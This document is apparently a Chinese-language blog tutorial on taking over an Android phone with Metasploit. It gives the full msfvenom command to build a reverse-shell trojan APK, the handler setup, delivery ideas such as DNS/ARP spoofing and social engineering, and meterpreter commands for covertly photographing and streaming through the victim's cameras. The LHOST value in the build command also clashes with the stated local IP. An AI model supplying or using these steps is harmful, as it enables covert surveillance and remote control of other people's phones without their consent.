MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
我這里做測試的系統是Backbox linux ,這是一款網絡滲透,信息安全評估系統。里邊安裝了許許多多的工具。其中MSF就自帶有。當然還有其它的 比如Kali linux 、Back Track這些等等。
環境:Backbox linux+MSF
目標:一台安卓手機
既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP
本機IP:192.168.1.6
在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木馬 現在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示
msfpayload無法找到命令 所以使用msfvenom即可,這里LHOST 對應的是本機的IP地址 LPORT對應你要監聽的端口 然后生成木馬的路徑
這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件,至於木馬的免殺暫且不談。現在我們在來啟動MSF工具
輸入命令:msfconsole
然后輸入:
1. use exploit/multi/handler 加載模塊
2. set payload android/meterpreter/reverse_tcp 選擇Payload
3.show options 查看參數設置
我們看見payload里邊有兩個參數要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現在我們來更改設置
1.set LHOST 192.168.1.6 這里的地址設置成我們剛才生成木馬的IP地址
2.set LPORT 5555 這里的端口設置成剛才我們生成木馬所監聽的端口
3.exploit 開始執行漏洞 開始監聽...
OK,一切准備工作准備就緒。。。現在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件 就會下載我們的木馬文件
還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機上做測試
安裝完成后 會在桌面上生成一個MainActivity的程序圖標 這個就是我們剛才生成的木馬 當我們點擊了這個圖標 手機會沒有任何反應 其實木馬已經開始運行起來了
我們可以在我們的MSF里看見有一個會話連接了
這樣對方的手機就就被我們控制了,查看手機系統信息,輸入命令 sysinfo
webcam_list查看手機攝影頭有幾個 這里顯示兩項 分別表示有前后兩個攝像頭
webcam_snap 隱秘拍照功能
后邊跟上參數-i 指定使用那個攝像頭拍照
可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上
還可以輸入命令 webcam_stream 開啟攝像頭
其它的功能還有更多 。暫時就先到這吧。。。